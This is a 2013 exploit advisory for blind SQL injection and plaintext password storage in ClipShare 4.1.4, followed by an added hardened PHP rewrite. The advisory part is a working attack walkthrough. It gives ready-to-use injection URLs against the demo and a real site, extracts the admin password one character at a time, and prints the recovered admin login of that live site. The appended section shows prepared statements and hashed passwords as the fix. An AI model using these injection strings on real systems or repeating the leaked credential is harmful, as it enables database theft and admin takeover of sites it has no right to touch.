
ClipShare 4.1.4 SQL Injection / Plaintext Password

Reported: 14 Mar 2013, by Akastep. Type: packetstorm. Source: packetstormsecurity.com

ClipShare 4.1.4 SQL Injection / Plaintext Password vulnerability in ugroup_videos.ph

Code

```text
=====================================================================
Vulnerable Software: ClipShare - Video Sharing Community Script 4.1.4
Official site: http://www.clip-share.com
Software License: Commercial.
Vulns: Blind SQL injection && Plaintext Password.
======================================================================
AFAIK all versions are vulnerable:
Official Demo is also vulnerable: http://www.clipsharedemo.com/ugroup_videos.php?urlkey=%27%20and%203=%273
Last Checked: 13 March 2013

NOTE: To exploit this vulnerability the MAGIC_QUOTES_GPC directive must be turned off on the server side (php.ini).
Vulnerable Script:
//ugroup_videos.php
=========================== BEGIN OF ugroup_videos.php =============================================
<?php
/**************************************************************************************************
| Software Name : ClipShare - Video Sharing Community Script
| Software Author : Clip-Share.Com / ScriptXperts.Com
| Website : http://www.clip-share.com
| E-mail : [email protected]
|**************************************************************************************************
| This source file is subject to the ClipShare End-User License Agreement, available online at:
| http://www.clip-share.com/video-sharing-script-eula.html
| By using this software, you acknowledge having read this Agreement and agree to be bound thereby.
|**************************************************************************************************
| Copyright (c) 2006-2007 Clip-Share.com. All rights reserved.
|**************************************************************************************************/

require('include/config.php');
require('include/function.php');

$urlkey = ( isset($_REQUEST['urlkey']) ) ? $_REQUEST['urlkey'] : NULL;
$uid = ( isset($_REQUEST['UID']) && is_numeric($_REQUEST['UID']) ) ? $_REQUEST['UID'] : NULL;

$sql="SELECT * from group_own WHERE gurl='" .$urlkey. "' limit 1";
$rs = $conn->Execute($sql);
if($rs->recordcount()>0) {
STemplate::assign('groupname',$rs->fields[gname]);
//PAGING STARTS
$page = ( isset($_REQUEST['page']) && is_numeric($_REQUEST['page']) ) ? $_REQUEST['page'] : NULL;
$sql = "SELECT count(*) as total from group_mem WHERE GID='" .$rs->fields['GID']. "' limit 1";
$ars = $conn->Execute($sql);
$total = ( $ars->fields['total']<=$config['total_per_ini'] ) ? $ars->fields['total'] : $config['total_per_ini'];
$tpage = ceil($total/$config['items_per_page']);
$spage = ( $tpage == 0 ) ? $tpage+1 : $tpage;
$startfrom = ($page-1)*$config['items_per_page'];
$sql = "SELECT m.*,s.addtime from group_mem as m,signup as s WHERE m.MID=s.UID and m.GID='".$rs->fields['GID']."' limit $startfrom, " .$config['items_per_page'];
$rs = $conn->execute($sql);
if($rs->recordcount()>0)
$vdo = $rs->getrows();
$start_num = $startfrom+1;
$end_num = $startfrom+$rs->recordcount();
$page_link = '';
$type = ( isset($_REQUEST['type']) && $_REQUEST['type'] != '' ) ? "&type=" .$_REQUEST['type'] : NULL;
for ( $k=1;$k<=$tpage;$k++ )
$page_link.="<a href='group_members.php?UID=" .$uid. "&page=" .$k. $type. "'>$k</a>&nbsp;&nbsp;";
//END PAGING
}

STemplate::assign('err',$err);
STemplate::assign('msg',$msg);
STemplate::assign('page',$page);
STemplate::assign('start_num',$start_num);
STemplate::assign('end_num',$end_num);
STemplate::assign('page_link',$page_link);
STemplate::assign('total',$total);
STemplate::assign('answers',$vdo);
STemplate::assign('head_bottom',"grouplinks.tpl");
STemplate::display('head1.tpl');
STemplate::display('err_msg.tpl');
STemplate::display('ugroup_members.tpl');
STemplate::display('footer.tpl');
STemplate::gzip_encode();
?>

====================END OF ugroup_videos.php========================
Real exploitation example:

_REMOVED_/ugroup_videos.php?urlkey=1' order by 14-- 3='3

http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(5=5,0,3))-- 3='3

//ON TRUE
//RETURNS: NORMAL PAGE
http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(5=5,0,3))-- 3='3

//ON FALSE
// RETURNS NOTHING. (White Page)
http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(5=2,0,3))-- 3='3

Plaintext password:
//siteadmin/login.php
============ BEGIN OF siteadmin/login.php ===========================
<?php
include('../include/config.php');

if ( isset($_POST['submit_login']) ) {
$username = trim($_POST['username']);
$password = trim($_POST['password']);

if ( $username == '' or $password == '' ) {
$err = 'Please provide a username and password!';
} else {
$access = false;
$sql = "SELECT soption FROM sconfig WHERE soption = 'admin_name' AND svalue = '" .mysql_real_escape_string($username). "'";
$conn->execute($sql);
if ( $conn->Affected_Rows() == 1 ) {
$sql = "SELECT soption FROM sconfig WHERE soption = 'admin_pass' AND svalue = '" .mysql_real_escape_string($password). "'";
$conn->execute($sql);
if ( $conn->Affected_Rows() == 1 ) {
$access = true;
}
}
// SNIP //
============ END OF siteadmin/login.php ===========================

//TRUE
http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(count(`svalue`)!=0,0,3) from sconfig)-- 3='3

80 user: http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(count(`svalue`)=80,0,3) from sconfig)-- 3='3

http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(count(0)=1,0,3) from sconfig where soption='admin_name')-- 3='3

Extracting the password:

http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(length(svalue)='11',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3

The password is 11 characters long.

========================================================

1st character: o

http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,1,1)='o',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3

========================================================
2nd character: (

http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,2,1)='(',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3

========================================================
3rd character: 2

http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,3,1)='2',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3

========================================================

4th character: n

http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,4,1)='n',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3

========================================================

5th character: @

http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,5,1)='@',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3

========================================================

6th character: b
http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,6,1)='b',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3

========================================================

7th character: % (check later)

http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,7,1)='%',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3

========================================================

8th character: h

http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,8,1)='h',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3

========================================================

9th character: a

http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,9,1)='a',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3

========================================================

10th character: 5

http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,10,1)='5',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3

========================================================
11th character: 1

http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,11,1)='1',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3

========================================================

http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,1,15)='o(2n@b%ha51',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3

//The password is entirely correct; there is no need to check the ASCII (hex) representation. (Its being plaintext is what raised the doubt.)
http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(mid(svalue,1,15)=0x6F28326E40622568613531,0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3

pass: o(2n@b%ha51

http://_REMOVED_/ugroup_videos.php?urlkey=1' or (select if(svalue='admin',0,3) from sconfig where soption='admin_name' limit 1 offset 0)-- 3='3

login: admin
pass: o(2n@b%ha51

http://_REMOVED_/siteadmin/

OwnEd.
Tested version:
Tuesday, March 12, 2013 | Version: 4.1.4 | Username: admin | Logout
Copyright © 2006-2008 ClipShare. All rights reserved.

=========================================
KUDOSSSSSSS
=========================================
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
secunia.com
securityhome.eu
exploitsdownload.com
osvdb.com
websecurity.com.ua
1337day.com
itsecuritysolutions.org
waraxe.us

Waving hello :D
ottoman38 & Ferid23 & Metaizm &HERO_AZE & BOT_25 &CAMOUFL4G3
4R!F * Orxan_204 & & SEXAVET & Manifesto & J_OF_R &
& etc.
===========================================

/AkaStep
```
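Added example, not ClipShare's code and not part of the advisory above: the two defects the advisory documents, the `gurl` lookup that splices `urlkey` straight into SQL and the admin login that stores and compares the password in plaintext, rewritten the way a maintainer would fix them. It assumes PDO with the SQLite driver; the table and column names (`group_own.gurl`, `sconfig.soption`/`svalue`) come from the advisory, while the rows, the password `example-password` and the function names are constructed for the demonstration. The advisory notes that `magic_quotes_gpc` has to be off for the injection to work; that directive was removed in PHP 5.4 and was never a dependable control, so the fix below does not rely on escaping at all but binds the input as a parameter.

```php
<?php
// Added example (not ClipShare code): hardened versions of the two patterns from
// the advisory, using PDO prepared statements and password_hash()/password_verify().
// Runs stand-alone against an in-memory SQLite database with constructed rows.

declare(strict_types=1);

$pdo = new PDO('sqlite::memory:', null, null, [
    PDO::ATTR_ERRMODE            => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_DEFAULT_FETCH_MODE => PDO::FETCH_ASSOC,
]);

// Constructed schema and sample data; only the table/column names mirror the advisory.
$pdo->exec("CREATE TABLE group_own (GID INTEGER PRIMARY KEY, gurl TEXT, gname TEXT)");
$pdo->exec("CREATE TABLE sconfig (soption TEXT PRIMARY KEY, svalue TEXT)");
$pdo->exec("INSERT INTO group_own (GID, gurl, gname) VALUES (1, 'demo-group', 'Demo Group')");
$pdo->exec("INSERT INTO sconfig (soption, svalue) VALUES ('admin_name', 'admin')");

// Store a password hash, never the plaintext. 'example-password' is a constructed value.
$stmt = $pdo->prepare("INSERT INTO sconfig (soption, svalue) VALUES ('admin_pass', :hash)");
$stmt->execute([':hash' => password_hash('example-password', PASSWORD_DEFAULT)]);

/**
 * Hardened replacement for the gurl lookup in ugroup_videos.php (hypothetical name).
 * The user-supplied key is bound as a parameter, so whatever it contains it can
 * only ever be compared as a literal gurl value, never parsed as SQL.
 */
function findGroupByUrlKey(PDO $pdo, string $urlkey): ?array
{
    $stmt = $pdo->prepare("SELECT GID, gname FROM group_own WHERE gurl = :gurl LIMIT 1");
    $stmt->execute([':gurl' => $urlkey]);
    $row = $stmt->fetch();
    return $row === false ? null : $row;
}

/**
 * Hardened replacement for siteadmin/login.php (hypothetical name). The stored
 * admin name and password hash are read with a fixed statement, then compared in
 * PHP: hash_equals() for the name, password_verify() for the password. The
 * password itself never appears in a query and is never stored in plaintext.
 */
function adminLogin(PDO $pdo, string $username, string $password): bool
{
    $stmt = $pdo->query("SELECT soption, svalue FROM sconfig WHERE soption IN ('admin_name', 'admin_pass')");
    $cfg = [];
    foreach ($stmt as $row) {
        $cfg[$row['soption']] = $row['svalue'];
    }
    if (!isset($cfg['admin_name'], $cfg['admin_pass'])) {
        return false;
    }
    $nameOk = hash_equals($cfg['admin_name'], $username);
    $passOk = password_verify($password, $cfg['admin_pass']);
    return $nameOk && $passOk;
}

// Demonstration: the boolean probe quoted in the advisory is treated as an ordinary
// key and matches no row; the real key and the real credentials still work.
$probe = "1' or (select if(5=5,0,3))-- 3='3";
var_dump(findGroupByUrlKey($pdo, $probe));
var_dump(findGroupByUrlKey($pdo, 'demo-group'));
var_dump(adminLogin($pdo, 'admin', 'example-password'));
var_dump(adminLogin($pdo, 'admin', 'wrong-password'));
```

Run it with `php example.php` (any PHP build with the pdo_sqlite extension). The probe string from the advisory reaches the database as a bound value, so the `if(5=5,0,3)` condition is never evaluated and the lookup simply finds no group; with the login rewritten this way, a read of `sconfig` through some other flaw would yield only a password hash rather than the credential itself.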
